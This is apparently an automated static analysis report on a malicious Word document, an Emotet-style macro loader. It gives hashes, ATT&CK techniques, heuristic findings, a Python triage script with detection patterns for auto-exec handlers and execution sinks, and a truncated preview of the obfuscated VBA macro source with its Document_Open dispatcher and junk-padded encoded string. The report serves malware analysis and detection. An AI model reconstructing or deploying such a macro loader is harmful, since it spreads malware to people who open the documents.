Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9af4692240f25784…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 139.5 KB
Created: 2018-04-24 10:11:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18

MD5: 667f0fad6be4b962029b1f0ba98295b5
SHA-1: 04dfb0aa93badfddfbf8ccf6acf4336c41e40ad2
SHA-256: 9af4692240f25784b3f9c048cdbb438f36b249da837e37e8df767aa404cbefbb

Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a Microsoft Office Word document carrying VBA macros with a Document_Open handler, so macro code runs as soon as the document is opened with macros enabled, and a Shell() call, which gives the macro a path to code execution outside VBA. The extracted source is heavily obfuscated: most statements are dead-code arithmetic over undefined variables (harmless under On Error Resume Next and never read back), the real control flow goes through Application.Run with a procedure name assembled at runtime from concatenated strings, and a custom decoding function (ouYdW) is applied to a string literal padded with repeated junk tokens such as FDV+FDV and Ika; the arithmetic around its other two arguments collapses to the constants 2 and 126. The Shell() call flagged by the heuristics lies outside the previewed portion of the extracted source. Fragments visible in the padded literal (-obj…ec…t, random;, = .() are consistent with a PowerShell command being assembled, and the ClamAV signature name (Emodldr) points to an Emotet-style document loader, whose usual purpose is to download and execute a second-stage payload. Neither extracted URL is that download location: http://FDV+FDV188 is a fragment of the obfuscated string data and http://schemas.openxmlformats.org/drawingml/2006/main is a standard OOXML namespace, so the second stage's origin is not recoverable from this static pass.
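As an added triage example (not code from this report or from the analysis platform that produced it), the Python below applies the same heuristics the findings above rest on to a constructed sample built from the macro preview: it looks for an auto-exec handler and an execution sink, flags dynamic dispatch through Application.Run, estimates how much of the source is arithmetic padding, and strips the repeated junk tokens from the literal passed to ouYdW(). The junk-token list is a guess taken only from what repeats in the visible literal, and the real decoder is not in the preview, so the stripped output exposes fragments (-objec, random;, = .() rather than a recovered command.

```python
"""Triage helpers for decoded VBA source, modelled on the heuristics the report
applies (auto-exec handler, execution sink, obfuscation padding, junk-token
string encoding). Added example; not part of the analysis platform's own code."""
import re

# Procedures Office runs without user interaction once macros are enabled.
AUTO_EXEC = re.compile(
    r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec|AutoExit|Document_Close)\b",
    re.I)
# Sinks through which a macro reaches code execution outside VBA.
EXEC_SINKS = re.compile(
    r"\b(Shell|Application\.Run|CreateObject|WScript\.Shell|CallByName)\b", re.I)
# Numeric conversion / math builtins that the padding lines chain together.
CAST_FUNCS = re.compile(
    r"\b(CDbl|CSng|CByte|CBool|CInt|CLng|Int|Fix|Round|Atn|Sqr|Log|Abs)\s*\(", re.I)


def is_padding(line: str) -> bool:
    """Assignment built only from numeric literals and casts over undefined
    names: under On Error Resume Next it evaluates to junk and is never read."""
    return (re.match(r"^\s*\w+\s*=", line) is not None
            and '"' not in line
            and len(CAST_FUNCS.findall(line)) >= 3)


def triage(vba: str) -> dict:
    lines = [l for l in vba.splitlines() if l.strip()]
    padding = sum(1 for l in lines if is_padding(l))
    auto = sorted({m.group(1).lower() for m in AUTO_EXEC.finditer(vba)})
    sinks = sorted({m.group(1).lower() for m in EXEC_SINKS.finditer(vba)})
    # Dynamic dispatch: Application.Run / CallByName with a target name built
    # from concatenated variables hides the real callee from a string scan.
    dynamic = bool(re.search(r"(Application\.Run|CallByName)\s+\w+\s*\+", vba, re.I))
    return {
        "auto_exec": auto,
        "exec_sinks": sinks,
        "dynamic_dispatch": dynamic,
        "padding_ratio": padding / len(lines) if lines else 0.0,
        "verdict": "suspicious" if auto and sinks else "review",
    }


def strip_junk(s: str, junk: tuple) -> str:
    """Remove filler tokens in the given order. Deleting the PowerShell-style
    "'+'" concatenation marks first lets split tokens such as FD'+'V+FDV
    re-form, so the next pass can remove them whole."""
    for tok in junk:
        s = s.replace(tok, "")
    return s


# Constructed sample: a few lines copied from the macros.bas preview.
SAMPLE = '''Sub JSCCEr(lOspit)
XHUpz = 61571 - CDbl(38986 / Int(56903) - 68566 / Round(87305 / CSng(7259 - CByte(46230)))) * FKiaMS * Fix(23483) - 13521 / CByte(jkBqFh) / IktKO - CBool(21225) / wTCSUf / Atn(67886)
End Sub
Private Sub Document_open()
On Error Resume Next
vGVimh = 29437 - CDbl(20060 / Int(97598) - 30175 / Round(14018 / CSng(22207 - CByte(31676)))) * avKACR * Fix(84988) - 40531 / CByte(iUoGdQ) / ZzWXZu - CBool(82540) / HzsaBo / Atn(40863)
Application.Run JPvBbj + "nDwtwTQk" + TBZfmO, bltBqH + MOmDZpBVVEhjQ + sMfEht
End Sub
'''

# The literal handed to ouYdW() in MOmDZpBVVEhjQ, verbatim from the preview.
ENCODED = ("fFDV+FD'+'VIkaFD'+'V+FDV+IkawFDV+FDV-objFDV+FDVecIka+IkatIka) random;"
           "nF'+'DV+FDVgTFDV+FDVYYU FDV+FDV= .(FDV+FDVIkane'+'FDV+FDVI,5vzRnO")
# Guessed filler tokens (assumption): only what visibly repeats in the literal.
JUNK = ("'+'", "FDV+FDV", "Ika")

if __name__ == "__main__":
    print(triage(SAMPLE))
    print(strip_junk(ENCODED, JUNK))
```

On the constructed sample the padding ratio is 0.25; over the full macros.bas, where nearly every statement is such arithmetic, it is far higher, and that disproportion is the signal that the numeric noise is obfuscation rather than logic.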

Heuristics (5)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA (not within the first lines of the preview below; the extracted source is truncated there)
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro: the code runs automatically when the document is opened with macros enabled
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://FDV+FDV188 (in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    Neither URL is a payload location: the first is a fragment of the obfuscated string data (FDV+FDV is the junk token used throughout the macro), and the second is the standard OOXML DrawingML namespace present in any document with drawing content.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 42062 bytes
SHA-256: ca0d862bbf41b7ab66c8a4b774fb0c7d66cc3d0e11bf7536b128f1f011ef38f8

Preview script (first 1,000 lines of the extracted script; truncated below)
Attribute VB_Name = "hATQAab"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JSCCEr(lOspit)
XHUpz = 61571 - CDbl(38986 / Int(56903) - 68566 / Round(87305 / CSng(7259 - CByte(46230)))) * FKiaMS * Fix(23483) - 13521 / CByte(jkBqFh) / IktKO - CBool(21225) / wTCSUf / Atn(67886)
End Sub
Sub wjBpb(ScQhzY)
knJamb = 52379 - CDbl(16320 / Int(20586) - 25136 / Round(52117 / CSng(89071 - CByte(60909)))) * HKzrbQ * Fix(45794) - 72750 / CByte(pPGWq) / ddOmE - CBool(28001) / tsiEIA / Atn(76535)
avvvL = 36065 - CDbl(31261 / Int(80117) - 46544 / Round(15576 / CSng(4777 - CByte(96583)))) * UKfEk * Fix(776) - 64739 / CByte(MHaVbQ) / IWIXw - CBool(3769) / ULbfp / Atn(24592)
qiCQNZ = 64761 - CDbl(6028 / Int(99236) - 44634 / Round(311 / CSng(11803 - CByte(69709)))) * nUZjB * Fix(16513) - 63002 / CByte(zfAPF) / TdFLUu - CBool(41926) / YFNrZF / Atn(44939)
End Sub
Sub XrRAhr(vnEHp)
XQwTrj = 42380 - CDbl(34086 / Int(79020) - 71649 / Round(79496 / CSng(85446 - CByte(20159)))) * UWJiad * Fix(28542) - 15647 / CByte(wFIcb) / XQnjw - CBool(2971) / PYiWBT / Atn(65395)
cHWvh = 47783 - CDbl(56933 / Int(41564) - 62499 / Round(22030 / CSng(30468 - CByte(28717)))) * zOjGu * Fix(14923) - 33725 / CByte(BLMui) / lAEcv - CBool(50252) / Vzmhu / Atn(71386)
End Sub
Private Sub Document_open()
On Error Resume Next
vGVimh = 29437 - CDbl(20060 / Int(97598) - 30175 / Round(14018 / CSng(22207 - CByte(31676)))) * avKACR * Fix(84988) - 40531 / CByte(iUoGdQ) / ZzWXZu - CBool(82540) / HzsaBo / Atn(40863)
Application.Run JPvBbj + "nDwtwTQk" + TBZfmO, bltBqH + MOmDZpBVVEhjQ + sMfEht
ZRTnN = 69831 - CDbl(59888 / Int(81924) - 66487 / Round(28804 / CSng(41970 - CByte(86638)))) * CVzPE * Fix(29067) - 19006 / CByte(GhAwN) / QDPwun - CBool(75344) / kGrYdS / Atn(70454)
End Sub
Sub ifzAm(NPASj)
SkSoAp = 27632 - CDbl(76059 / Int(35838) - 35291 / Round(52960 / CSng(11580 - CByte(38666)))) * lsYjl * Fix(83097) - 72345 / CByte(CUBMI) / qAwcDE - CBool(55014) / nDYoE / Atn(94394)
MErjil = 38847 - CDbl(83545 / Int(38058) - 63334 / Round(85029 / CSng(94422 - CByte(26947)))) * wnnjUz * Fix(34930) - 42090 / CByte(CPfkFU) / wmoUp - CBool(31791) / jiHVJ / Atn(55148)
LHOSpQ = 70579 - CDbl(16424 / Int(68561) - 99162 / Round(34556 / CSng(82006 - CByte(9270)))) * QwAPWL * Fix(70356) - 10213 / CByte(tshcH) / MbJtD - CBool(82727) / QSPEX / Atn(76560)
End Sub
Sub oCzLV(jGGmR)
GwUaH = 75847 - CDbl(56925 / Int(13984) - 44103 / Round(45918 / CSng(16994 - CByte(95064)))) * zIhiz * Fix(36300) - 77029 / CByte(CTrtWH) / UFUXct - CBool(71026) / wrIQt / Atn(62582)
End Sub
Sub RtBKXG(YHTdNE)
chlfmm = 33045 - CDbl(5621 / Int(72663) - 41020 / Round(14498 / CSng(24749 - CByte(98174)))) * rrCuQV * Fix(4820) - 97560 / CByte(LkkWhN) / zfjiT - CBool(19552) / kHuPO / Atn(14295)
DKHNhQ = 32632 - CDbl(67142 / Int(95602) - 65975 / Round(55185 / CSng(57548 - CByte(81001)))) * vBQjph * Fix(42839) - 54232 / CByte(URjURm) / GorLH - CBool(49162) / JAzmQh / Atn(97294)
End Sub

Attribute VB_Name = "pUwpGif"
Sub ZKbin(Avzwbb)
mfSVYH = 67573 - CDbl(84201 / Int(90517) - 11800 / Round(89569 / CSng(64184 - CByte(36861)))) * MYcfsb * Fix(29746) - 34262 / CByte(jupNA) / nTFWN - CBool(5877) / dThWwh / Atn(58499)
End Sub
Function MOmDZpBVVEhjQ()
On Error Resume Next
ZaNiGn = 91931 - CDbl(21292 / Int(3774) - 68188 / Round(13430 / CSng(62379 - CByte(73537)))) * wlFfDF * Fix(6893) - 87919 / CByte(bTCZd) / nRzond - CBool(77139) / tEvtPX / Atn(74177)
OjwqEzQJjX = ouYdW("fFDV+FD'+'VIkaFD'+'V+FDV+IkawFDV+FDV-objFDV+FDVecIka+IkatIka) random;nF'+'DV+FDVgTFDV+FDVYYU FDV+FDV= .(FDV+FDVIkane'+'FDV+FDVI,5vzRnO", dNZWE - dNZWE + 2 + dNZWE - dNZWE, dNZWE - dNZWE + 126 + dNZWE - dNZWE)
YmWwCb = 96463 - CDbl(81565 / Int(25640) - 80000 / Round(61986 / CSng(31253 - CByte(74157)))) * DNROO * Fix(34043) - 18455 / CByte(wJHGLa) / MnWXj - CBool(91392) / DftMT / Atn(13417)
wXECd = 80038 - CDbl(6786 / Int(47702) - 9633 /
... (truncated)